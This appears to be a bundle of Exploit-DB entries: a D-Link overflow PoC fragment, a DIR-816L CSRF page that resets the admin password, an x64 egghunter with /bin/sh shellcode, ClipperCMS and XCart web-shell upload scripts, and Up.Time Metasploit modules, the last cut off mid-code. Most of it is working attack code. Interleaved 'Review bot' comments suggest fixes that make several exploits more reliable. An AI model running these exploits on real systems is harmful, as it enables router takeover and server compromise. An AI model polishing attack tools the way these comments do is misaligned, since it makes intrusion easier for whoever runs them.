buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
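Review bot: The PoC admits only in a trailing comment (`Needs a proper shell code`) that the payload slot is a run of `A`s, so what is published is a crash PoC rather than the code execution the summary implies; the summary should say so and move the bad-character note (`Bad chars 1,0 in the first bit of hex byte so 1x or 0x`) into the details where a reader will see it. `sys.argv[1]` is read without a check, so running the script with no argument dies with an `IndexError`; `if len(sys.argv) != 2: sys.exit("usage: %s <target>" % sys.argv[0])` is a cheap guard. `s.send(buf)` on this large buffer should be `s.sendall(buf)`, and `import string` and `import struct` are unused.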


@ -0,0 +1,96 @@
----------------------------------------------------------------------------------------------
Title:
====
D-link wireless router DIR-816L Cross-Site Request Forgery (CSRF) vulnerability
Credit:
======
Name: Bhadresh Patel
Company/affiliation: HelpAG
Website: www.helpag.com
CVE:
=====
CVE-2015-5999
Date:
====
10-11-2015 (dd/mm/yyyy)
Vendor:
======
D-Link is a computer networking company with relatively modest beginnings in Taiwan. The company has grown over the last 25 years into an exciting global brand offering the most up-to-date network solutions. Whether it is to suit the needs of the home consumer, a business or service provider, D-link take pride in offering award-winning networking products and services.
Product:
=======
DIR-816L is a wireless AC750 Dual Band Cloud Router
Product link: http://support.dlink.com/ProductInfo.aspx?m=DIR-816L
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-816L wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
Report-Timeline:
============
27-07-2015: Vendor notification
27-07-2015: Vendor Response/Feedback
05-11-2015: Vendor Fix/Patch
10-11-2015: Public or Non-Public Disclosure
Affected Version:
=============
<=2.06.B01
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
Details:
=======
An attacker who lures a DIR-816L authenticated user to browse a malicious website can exploit cross site request forgery (CSRF) to submit commands to DIR-816L wireless router and gain control of the product. The attacker could submit variety of commands including but not limited to changing the admin account password, changing the network policy, etc.
Proof Of Concept:
================
1) User login to DIR-816L wireless router
2) User visits the attacker's malicious web page (attacker.html)
3) attacker.html exploits CSRF vulnerability and changes the admin account password
PoC video link: http://youtu.be/UBdR2sUc8Wg
Exploit code (attacker.html):
<html>
<body>
<iframe style="display:none" name="hiddenpost"></iframe>
<form action="http://192.168.0.1/hedwig.cgi" method="POST" enctype="text/plain" target="hiddenpost" id="csrf">
<input type="hidden" name="<&#63;xml&#32;version" value=""1&#46;0"&#32;encoding&#61;"UTF&#45;8"&#63;>&#10;<postxml>&#10;<module>&#10;&#9;<service>DEVICE&#46;ACCOUNT<&#47;service>&#10;&#9;<device>&#10;&#9;&#9;<gw&#95;name>DIR&#45;816L<&#47;gw&#95;name>&#10;&#9;&#9;&#10;&#9;&#9;<account>&#10;&#9;&#9;&#9;<seqno>1<&#47;seqno>&#10;&#9;&#9;&#9;<max>2<&#47;max>&#10;&#9;&#9;&#9;<count>1<&#47;count>&#10;&#9;&#9;&#9;<entry>&#10;&#9;&#9;&#9;&#9;<uid>USR&#45;<&#47;uid>&#10;&#9;&#9;&#9;&#9;<name>Admin<&#47;name>&#10;&#9;&#9;&#9;&#9;<usrid&#47;>&#10;&#9;&#9;&#9;&#9;<password>password<&#47;password>&#10;&#9;&#9;&#9;&#9;<group>0<&#47;group>&#10;&#9;&#9;&#9;&#9;<description&#47;>&#10;&#9;&#9;&#9;<&#47;entry>&#10;&#9;&#9;<&#47;account>&#10;&#9;&#9;<group>&#10;&#9;&#9;&#9;<seqno&#47;>&#10;&#9;&#9;&#9;<max&#47;>&#10;&#9;&#9;&#9;<count>0<&#47;count>&#10;&#9;&#9;<&#47;group>&#10;&#9;&#9;<session>&#10;&#9;&#9;&#9;<captcha>1<&#47;captcha>&#10;&#9;&#9;&#9;<dummy&#47;>&#10;&#9;&#9;&#9;<timeout>180<&#47;timeout>&#10;&#9;&#9;&#9;<maxsession>128<&#47;maxsession>&#10;&#9;&#9;&#9;<maxauthorized>16<&#47;maxauthorized>&#10;&#9;&#9;<&#47;session>&#10;&#9;<&#47;device>&#10;<&#47;module>&#10;<module>&#10;&#9;<service>HTTP&#46;WAN&#45;1<&#47;service>&#10;&#9;<inf>&#10;&#9;&#9;<web><&#47;web>&#10;&#9;&#9;<https&#95;rport><&#47;https&#95;rport>&#10;&#9;&#9;<stunnel>1<&#47;stunnel>&#10;&#9;&#9;<weballow>&#10;&#9;&#9;&#9;<hostv4ip&#47;>&#10;&#9;&#9;<&#47;weballow>&#10;&#9;&#9;<inbfilter&#47;>&#10;&#9;<&#47;inf>&#10;&#9;&#10;<&#47;module>&#10;<module>&#10;&#9;<service>HTTP&#46;WAN&#45;2<&#47;service>&#10;&#9;<inf>&#10;&#9;&#9;<active>0<&#47;active>&#10;&#9;&#9;<nat>NAT&#45;1<&#47;nat>&#10;&#9;&#9;<web&#47;>&#10;&#9;&#9;<weballow>&#10;&#9;&#9;&#9;<hostv4ip&#47;>&#10;&#9;&#9;<&#47;weballow>&#10;&#9;<&#47;inf>&#10;&#9;&#10;<&#47;module>&#10;<module>&#10;&#9;<service>INBFILTER<&#47;service>&#10;&#9;<acl>&#10;&#9;&#9;<inbfilter>&#9;&#9;&#10;&#9;&#9;&#9;&#9;&#9;&#9;<seqno>1<&#47;seqno>&#10;&#9;&#9;&#9;<max>24<&#4
7;max>&#10;&#9;&#9;&#9;<count>0<&#47;count>&#10;&#10;&#9;&#9;<&#47;inbfilter>&#9;&#9;&#10;&#9;<&#47;acl>&#10;&#9;<ACTIVATE>ignore<&#47;ACTIVATE>&#10;<FATLADY>ignore<&#47;FATLADY><SETCFG>ignore<&#47;SETCFG><&#47;module>&#10;<module>&#10;&#9;<service>SHAREPORT<&#47;service>&#10;&#9;<FATLADY>ignore<&#47;FATLADY>&#10;&#9;&#10;<ACTIVATE>ignore<&#47;ACTIVATE><&#47;module>&#10;<module>&#10;&#9;<service>SAMBA<&#47;service>&#10;&#9;<samba>&#9;&#9;&#10;&#9;&#9;&#32;&#32;&#32;&#32;&#10;&#9;&#9;<enable>1<&#47;enable>&#10;&#9;&#9;<auth>1<&#47;auth>&#10;&#10;&#32;&#32;&#32;&#32;<&#47;samba>&#10;<&#47;module>&#10;<&#47;postxml>" />
</form>
<script>alert("This is CSRF PoC");document.getElementById("csrf").submit()</script>
<iframe style="display:none" name="hiddencommit"></iframe>
<form action="http://192.168.0.1/pigwidgeon.cgi" method="POST" target="hiddencommit" id="csrf1">
<input type="hidden" name="ACTIONS" value="SETCFG&#44;SAVE&#44;ACTIVATE" />
</form>
<script>document.getElementById("csrf1").submit()</script>
</body>
</html>
Patched/Fixed Firmware and notes:
==========================
2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_2.06.B09_BETA.ZIP
2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_NOTES_2.06.B09_BETA_EN.PDF
Credits:
=======
Bhadresh Patel
Senior Security Analyst
HelpAG (www.helpag.com)
----------------------------------------------------------------------------------------------
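Review bot: The hidden input's `value` attribute appears to be split across two lines in the middle of an entity (`&#4` ending one line, `7;max>` starting the next); if that break exists in the stored file the HTML is malformed and the posted XML is corrupt, so confirm it is only a display wrap and keep the PoC on a single line. The `pigwidgeon.cgi` form is submitted right after the `hedwig.cgi` form; the `alert()` between them happens to serialize the two, but a non-interactive version needs an explicit ordering (for example submitting the second form from the first iframe's `onload`), otherwise `SETCFG,SAVE,ACTIVATE` can race the configuration upload. The CVSS vector is `AV:A`, yet the attack needs only that the admin load a remote page, which is usually scored `AV:N`; either justify the adjacent-network vector or rescore. The fixed firmware is a `_BETA` build, which is worth flagging for users who can only deploy release builds.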


@ -0,0 +1,43 @@
/*
;Title: x64 Linux egghunter in 24 bytes
;Author: David Velázquez a.k.a d4sh&r
;Contact: https://mx.linkedin.com/in/d4v1dvc
;Description: x64 Linux egghunter that looks for the string "h@ckh@ck"
; and then execute the shellcode
;Tested On: Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux
;Compile & Run: nasm -f elf64 -o egghunter.o egghunter.nasm
; ld -o egghunter egghunter.o
;SLAE64-1379
global _start
_start:
pop rax ; some address in the stack
search:
inc rax
cmp [rax - 4] , dword 0x6b634068 ; "h@ck"
jnz search
cmp [rax - 8] , dword 0x6b634068 ; "h@ck"
jnz search
call rax ; execute shellcode
*/
#include<stdio.h>
#include<string.h>
//gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
unsigned char hunter[] = "\x58\x48\xff\xc0\x81\x78\xfc\x68\x40\x63\x6b\x75\xf4\x81\x78\xf8\x68\x40\x63\x6b\x75\xeb\xff\xd0";
unsigned char egg[] = \
"\x68\x40\x63\x6b" //egg
"\x68\x40\x63\x6b" //egg
"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x0$
int main()
{
printf("Hunter Length: %d\n", (int)strlen(hunter));
(*(void (*)()) hunter)();
}


@ -0,0 +1,26 @@
##################################
# Andrea Sindoni - @invictus1306 #
##################################
XSS vulnerability via metadata
1. Introduction
Affected Product: VLC 2.2.1 / WEB INTERFACE
Vulnerability Type: XSS
2. Vulnerability Description
XSS vulnerability via metadata title
3. Proof of Concept
3.1 Launch: vlc.exe --http-host=127.0.0.1 --http-port=8080 --http-password=andrea
3.2 Open Browser and go to localhost:8080 (for more info see https://wiki.videolan.org/Documentation:Modules/http_intf/)
3.3 Then left username blank and password andrea
3.4 Select poc.mp3 (attached) file
3.5 See Attached image
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38706.zip

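--- a/platforms/php/remote/38730.py
+++ b/platforms/php/remote/38730.py
@@ -0,0 +1,81 @@
+#!/usr/local/bin/python
+# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
+# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
+# The server must parse htaccess files for this exploit to work.
+# Curesec GmbH crt@curesec.com
+import sys
+import re
+import requests # requires requests lib
+if len(sys.argv) != 4:
+exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+loginPath = "/manager/processors/login.processor.php"
+fileManagerPath = "/manager/index.php?a=31"
+def login(requestSession, url, username, password):
+postData = {"ajax": "1", "username": username, "password": password}
+return requestSession.post(url, data = postData, headers = {"referer": url})
+def getFullPath(requestSession, url):
+request = requestSession.get(url, headers = {"referer": url})
+if "You don't have enough privileges" in request.text:
+return "cant upload"
+fullPath = re.search("var current_path = '(.*)';", request.text)
+return fullPath.group(1)
+def upload(requestSession, url, fileName, fileContent, postData):
+filesData = {"userfile[0]": (fileName, fileContent)}
+return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url})
+def workingShell(url, fullPath):
+return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/")
+def runShell(url):
+print("enter command, or enter exit to quit.")
+command = raw_input("$ ")
+while "exit" not in command:
+print(requests.get(url + command).text)
+command = raw_input("$ ")
+requestSession = requests.session()
+loginResult = login(requestSession, url + loginPath, username, password)
+if "Incorrect username" in loginResult.text:
+exit("ERROR: Incorrect username or password")
+else:
+print("successful: login as " + username)
+fullPath = getFullPath(requestSession, url + fileManagerPath)
+if fullPath == "cant upload":
+exit("ERROR: user does not have required privileges")
+else:
+print("successful: user is allowed to use file manager. Full path: " + fullPath)
+uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
+if "File uploaded successfully" not in uploadResult.text:
+exit("ERROR: could not upload .htaccess file")
+else:
+print("successful: .htaccess upload")
+uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath})
+if "File uploaded successfully" not in uploadResult.text:
+exit("ERROR: could not upload shell")
+else:
+print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>")
+if workingShell(url + "404.png?x=", fullPath):
+print("successful: shell seems to be working")
+else:
+exit("ERROR: shell does not seem to be working correctly")
+runShell(url + "404.png?x=")
+#Blog Reference:
+#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html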
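Review bot: The header comment says nothing about what the script leaves on the target: the `.htaccess` carrying `AddType application/x-httpd-php .png` and the `404.png` file stay in the file-manager directory after `runShell` exits, and nothing deletes them. A line such as `# Leaves .htaccess and 404.png in the upload directory; remove both after testing` after the Curesec line would cover it, and those two files are also what a defender would look for in an incident. Separately, `raw_input` in `runShell` exists only in Python 2, while the shebang just says `python`, so the header (or a `python2` shebang) should pin the interpreter.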

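--- a/platforms/php/remote/38731.py
+++ b/platforms/php/remote/38731.py
@@ -0,0 +1,66 @@
+#!/usr/local/bin/python
+# Exploit for XCart 5.2.6 Code Execution vulnerability
+# An admin account is required to use this exploit
+# Curesec GmbH
+import sys
+import re
+import requests # requires requests lib
+if len(sys.argv) != 4:
+exit("usage: python " + sys.argv[0] + " http://example.com/xcart/ admin@example.com admin")
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+loginPath = "/admin.php?target=login"
+fileManagerPath = "/admin.php?target=logo_favicon"
+shellFileName = "404.php"
+shellContent = "GIF89a;<?php passthru($_GET['x']); ?>"
+def login(requestSession, url, username, password):
+csrfRequest = requestSession.get(url)
+csrfTokenRegEx = re.search('name="xcart_form_id" type="hidden" value="(.*)" class', csrfRequest.text)
+csrfToken = csrfTokenRegEx.group(1)
+postData = {"target": "login", "action": "login", "xcart_form_id": csrfToken, "login": username, "password": password}
+loginResult = requestSession.post(url, data = postData).text
+return "Invalid login or password" not in loginResult
+def upload(requestSession, url, fileName, fileContent):
+csrfRequest = requestSession.get(url)
+csrfTokenRegEx = re.search('SimpleCMS" />\n<input type="hidden" name="xcart_form_id" value="(.*)" />', csrfRequest.text)
+csrfToken = csrfTokenRegEx.group(1)
+filesData = {"logo": (fileName, fileContent)}
+postData = {"target": "logo_favicon", "action": "update", "page": "CDev\SimpleCMS", "xcart_form_id": csrfToken}
+uploadResult = requestSession.post(url, files = filesData, data = postData)
+return "The data has been saved successfully" in uploadResult.text
+def runShell(url):
+print("enter command, or enter exit to quit.")
+command = raw_input("$ ")
+while "exit" not in command:
+print(requests.get(url + command).text.replace("GIF89a;", ""))
+command = raw_input("$ ")
+requestSession = requests.session()
+if login(requestSession, url + loginPath, username, password):
+print("successful: login")
+else:
+exit("ERROR: Incorrect username or password")
+if upload(requestSession, url + fileManagerPath, shellFileName, shellContent):
+print("successful: file uploaded")
+else:
+exit("ERROR: could not upload file")
+runShell(url + shellFileName + "?x=")
+Blog Reference:
+http://blog.curesec.com/article/blog/XCart-526-Code-Execution-Exploit-87.html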
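Review bot: The footer lines `Blog Reference:` and the blog URL are not commented out, unlike the same footer in 38730.py, so the file is a SyntaxError as committed; both need a leading `#`. `raw_input` in `runShell` is Python 2 only while the shebang only says `python`, the same portability gap as in 38730.py. The header should also state that `404.php`, which appears to be written through the logo/favicon upload handler, is left on the target and is not removed by the script.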

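--- a/platforms/php/remote/38732.rb
+++ b/platforms/php/remote/38732.rb
@@ -0,0 +1,103 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::PhpEXE
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload',
+'Description' => %q{
+This module exploits an arbitrary file upload vulnerability found within the Up.Time
+monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
+webroot without authentication, leading to arbitrary code execution.
+Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly
+mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use
+exploits/multi/http/uptime_file_upload_2.
+},
+'Author' =>
+[
+'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'OSVDB', '100423' ],
+[ 'BID', '64031'],
+[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
+],
+'Payload' =>
+{
+'Space' => 10000, # just a big enough number to fit any PHP payload
+'DisableNops' => true
+},
+'Platform' => 'php',
+'Arch' => ARCH_PHP,
+'Targets' =>
+[
+[ 'Up.Time 7.0/7.2', { } ],
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Nov 19 2013'))
+register_options([
+OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
+Opt::RPORT(9999)
+], self.class)
+end
+def check
+uri = target_uri.path
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(uri, 'wizards', 'post2file.php')
+})
+if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
+return Exploit::CheckCode::Appears
+end
+return Exploit::CheckCode::Safe
+end
+def exploit
+print_status("#{peer} - Uploading PHP to Up.Time server")
+uri = target_uri.path
+@payload_name = "#{rand_text_alpha(5)}.php"
+php_payload = get_write_exec_payload(:unlink_self => true)
+post_data = ({
+"file_name" => @payload_name,
+"script" => php_payload
+})
+print_status("#{peer} - Uploading payload #{@payload_name}")
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(uri, 'wizards', 'post2file.php'),
+'vars_post' => post_data,
+})
+unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
+fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
+end
+print_status("#{peer} - Executing payload #{@payload_name}")
+res = send_request_cgi({
+'uri' => normalize_uri(uri, 'wizards', @payload_name),
+'method' => 'GET'
+})
+end
+end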
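Review bot: The final `send_request_cgi` in `exploit` assigns `res` but nothing reads it afterwards, so the assignment is dead and should be dropped. `if res and res.code == 500 and res.body.to_s =~ ...` in `check` uses `and` where the rest of the framework uses `&&`. The module metadata disagrees with itself: `Name` says 7.0, the Description says "7.2 and below", and the target entry is 'Up.Time 7.0/7.2'. It is also worth a comment that `check` itself POSTs to the vulnerable `post2file.php` and keys on a 500 response, e.g. `# check() POSTs to post2file.php and expects a 500, which will show up in the target's web server error log`.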

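--- a/platforms/php/remote/38733.rb
+++ b/platforms/php/remote/38733.rb
@@ -0,0 +1,408 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+require 'nokogiri'
+class Metasploit4 < Msf::Exploit::Remote
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::PhpEXE
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload',
+'Description' => %q{
+This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0.
+The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,
+which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated
+by the vendor.
+Although the mitigiation in place will prevent uptime_file_upload_1.rb from working, it
+can still be bypassed and gain privilege escalation, and allows the attacker to upload file
+again, and execute arbitrary commands.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Denis Andzakovic', # Found file upload bug in post2file.php in 2013
+'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
+'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
+],
+'References' =>
+[
+['EDB', '37888'],
+['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php']
+],
+'Platform' => ['php'],
+'Arch' => ARCH_PHP,
+'Targets' => [['Automatic', {}]],
+'Privileged' => 'true',
+'DefaultTarget' => 0,
+# The post2file.php vuln was reported in 2013 by Denis Andzakovic. And then on Aug 2015,
+# it was discovered again by Ewerson 'Crash' Guimaraes.
+'DisclosureDate' => 'Nov 18 2013'
+))
+register_options(
+[
+Opt::RPORT(9999),
+OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
+OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
+], self.class)
+register_advanced_options(
+[
+OptString.new('UptimeWindowsDirectory', [true, 'Uptime installation path for Windows', 'C:\\Program Files\\uptime software\\']),
+OptString.new('UptimeLinuxDirectory', [true, 'Uptime installation path for Linux', '/usr/local/uptime/']),
+OptString.new('CmdPath', [true, 'Path to cmd.exe', 'c:\\windows\\system32\\cmd.exe'])
+], self.class)
+end
+def print_status(msg='')
+super("#{rhost}:#{rport} - #{msg}")
+end
+def print_error(msg='')
+super("#{rhost}:#{rport} - #{msg}")
+end
+def print_good(msg='')
+super("#{rhost}:#{rport} - #{msg}")
+end
+# Application Check
+def check
+res = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path)
+)
+unless res
+vprint_error("Connection timed out.")
+return Exploit::CheckCode::Unknown
+end
+n = Nokogiri::HTML(res.body)
+uptime_text = n.at('//ul[@id="uptimeInfo"]//li[contains(text(), "up.time")]')
+if uptime_text
+version = uptime_text.text.scan(/up\.time ([\d\.]+)/i).flatten.first
+vprint_status("Found version: #{version}")
+if version >= '7.4.0' && version <= '7.5.0'
+return Exploit::CheckCode::Appears
+end
+end
+Exploit::CheckCode::Safe
+end
+def create_exec_service(*args)
+cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args
+res_service = send_request_cgi(
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'main.php'),
+'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
+'vars_get' => {
+'section' => 'ERDCInstance',
+'subsection' => 'add',
+},
+'vars_post' => {
+'initialERDCId' => '20',
+'target' => '1',
+'targetType' => 'systemList',
+'systemList' => '1',
+'serviceGroupList' => '-10',
+'initialMode' => 'standard',
+'erdcName' => 'Exploit',
+'erdcInitialName' => '',
+'erdcDescription' => 'Exploit',
+'hostButton' => 'system',
+'erdc_id' => '20',
+'forceReload' => '0',
+'operation' => 'standard',
+'erdc_instance_id' => '',
+'label_[184]' => 'Script Name',
+'value_[184]' => cmd,
+'id_[184]' => 'process',
+'name_[process]' => '184',
+'units_[184]' => '',
+'guiBasic_[184]' => '1',
+'inputType_[184]' => 'GUIString',
+'screenOrder_[184]' => '1',
+'parmType_[184]' => '1',
+'label_[185]' => 'Arguments',
+'value_[185]' => cmdargs,
+'id_[185]' => 'args',
+'name_[args]' => '185',
+'units_[185]' => '',
+'guiBasic_[185]' => '1',
+'inputType_[185]' => 'GUIString',
+'screenOrder_[185]' => '2',
+'parmType_[185]' => '1',
+'label_[187]' => 'Output',
+'can_retain_[187]' => 'false',
+'comparisonWarn_[187]' => '-1',
+'comparison_[187]' => '-1',
+'id_[187]' => 'value_critical_output',
+'name_[output]' => '187',
+'units_[187]' => '',
+'guiBasic_[187]' => '1',
+'inputType_[187]' => 'GUIString',
+'screenOrder_[187]' => '4',
+'parmType_[187]' => '2',
+'label_[189]' => 'Response time',
+'can_retain_[189]' => 'false',
+'comparisonWarn_[189]' => '-1',
+'comparison_[189]' => '-1',
+'id_[189]' => 'value_critical_timer',
+'name_[timer]' => '189',
+'units_[189]' => 'ms',
+'guiBasic_[189]' => '0',
+'inputType_[189]' => 'GUIInteger',
+'screenOrder_[189]' => '6',
+'parmType_[189]' => '2',
+'timing_[erdc_instance_monitored]' => '1',
+'timing_[timeout]' => '60',
+'timing_[check_interval]' => '10',
+'timing_[recheck_interval]' => '1',
+'timing_[max_rechecks]' => '3',
+'alerting_[notification]' => '1',
+'alerting_[alert_interval]' => '120',
+'alerting_[alert_on_critical]' => '1',
+'alerting_[alert_on_warning]' => '1',
+'alerting_[alert_on_recovery]' => '1',
+'alerting_[alert_on_unknown]' => '1',
+'time_period_id' => '1',
+'pageFinish' => 'Finish',
+'pageContinue' => 'Continue...',
+'isWizard' => '1',
+'wizardPage' => '2',
+'wizardNumPages' => '2',
+'wizardTask' => 'pageFinish',
+'visitedPage[1]' => '1',
+'visitedPage[2]' => '1'
+})
+end
+def exploit
+vprint_status('Trying to login...')
+# Application Login
+res_auth = send_request_cgi(
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'index.php'),
+'vars_post' => {
+'username' => datastore['USERNAME'],
+'password' => datastore['PASSWORD']
+})
+unless res_auth
+fail_with(Failure::Unknown, 'Connection timed out while trying to login')
+end
+# Check OS
+phpfile_name = rand_text_alpha(10)
+if res_auth.headers['Server'] =~ /Unix/
+vprint_status('Found Linux installation - Setting appropriated PATH')
+phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph')
+uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards')
+cmdargs = "#{uploadpath}#{phpfile_name}.txt"
+cmd = phppath
+else
+vprint_status('Found Windows installation - Setting appropriated PATH')
+phppath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'apache\\php\\php.exe')
+uploadpath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'uptime\\GUI\\wizards\\')
+cmd = datastore['CmdPath']
+cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
+end
+if res_auth.get_cookies =~ /login=true/
+cookie = Regexp.last_match(1)
+cookie_split = res_auth.get_cookies.split(';')
+vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
+print_good('Login success')
+# Privilege escalation getting user ID
+res_priv = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path, 'main.php'),
+'vars_get' => {
+'page' => 'Users',
+'subPage' => 'UserContainer'
+},
+'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
+)
+unless res_priv
+fail_with(Failure::Unknown, 'Connection timed out while getting userID.')
+end
+matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/)
+unless matchdata
+fail_with(Failure::Unknown, 'Unable to find userID for escalation')
+end
+get_id = matchdata[0].gsub(/[^\d]/, '')
+vprint_status('Escalating privileges...')
+# Privilege escalation post
+res_priv_elev = send_request_cgi(
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'main.php'),
+'vars_get' => {
+'section' => 'UserContainer',
+'subsection' => 'edit',
+'id' => "#{get_id}"
+},
+'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
+'vars_post' => {
+'operation' => 'submit',
+'disableEditOfUsernameRoleGroup' => 'false',
+'username' => datastore['USERNAME'],
+'password' => datastore['PASSWORD'],
+'passwordConfirm' => datastore['PASSWORD'],
+'firstname' => rand_text_alpha(10),
+'lastname' => rand_text_alpha(10),
+'location' => '',
+'emailaddress' => '',
+'emailtimeperiodid' => '1',
+'phonenumber' => '',
+'phonenumbertimeperiodid' => '1',
+'windowshost' => '',
+'windowsworkgroup' => '',
+'windowspopuptimeperiodid' => '1',
+'landingpage' => 'MyPortal',
+'isonvacation' => '0',
+'receivealerts' => '0',
+'activexgraphs' => '0',
+'newuser' => 'on',
+'newuser' => '1',
+'userroleid' => '1',
+'usergroupid[]' => '1'
+}
+)
+unless res_priv_elev
+fail_with(Failure::Unknown, 'Connection timed out while escalating...')
+end
+# Refresing perms
+vprint_status('Refreshing perms...')
+res_priv = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'),
+'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
+)
+unless res_priv
+fail_with(Failure::Unknown, 'Connection timed out while refreshing perms')
+end
+res_auth = send_request_cgi(
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'index.php'),
+'vars_post' => {
+'username' => datastore['USERNAME'],
+'password' => datastore['PASSWORD']
+}
+)
+unless res_auth
+fail_with(Failure::Unknown, 'Connection timed out while authenticating...')
+end
+if res_auth.get_cookies =~ /login=true/
+cookie = Regexp.last_match(1)
+cookie_split = res_auth.get_cookies.split(';')
+vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
+print_good('Priv. Escalation success')
+end
+# CREATING Linux EXEC Service
+if res_auth.headers['Server'] =~ /Unix/
+vprint_status('Creating Linux Monitor Code exec...')
+create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
+else
+# CREATING Windows EXEC Service#
+vprint_status('Creating Windows Monitor Code exec...')
+create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
+end
+# Upload file
+vprint_status('Uploading file...')
+up_res = send_request_cgi(
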